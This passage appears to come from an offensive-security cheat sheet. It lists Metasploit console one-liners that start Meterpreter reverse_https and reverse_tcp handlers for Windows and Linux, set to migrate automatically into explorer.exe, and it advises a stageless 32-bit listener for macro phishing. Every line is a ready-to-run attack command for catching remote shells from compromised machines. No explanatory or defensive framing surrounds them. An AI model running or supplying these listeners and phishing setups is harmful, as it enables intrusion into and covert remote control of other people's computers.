msfconsole -q -x "use exploit/multi/handler; set PAYLOAD windows/x64/meterpreter/reverse_https; set LHOST 192.168.1.2; set LPORT 443; set AutoRunScript migrate -n explorer.exe; exploit"
For macros phishing use a stageless 32-bit listener
Windows - Stageless
msfconsole -q -x "use exploit/multi/handler; set PAYLOAD windows/meterpreter/reverse_https; set LHOST 192.168.1.2; set LPORT 443; set AutoRunScript migrate -n explorer.exe; exploit"
msfconsole -q -x "use exploit/multi/handler; set PAYLOAD linux/x64/meterpreter/reverse_tcp; set LHOST 192.168.1.2; set LPORT 443; set AutoRunScript migrate -n explorer.exe; exploit"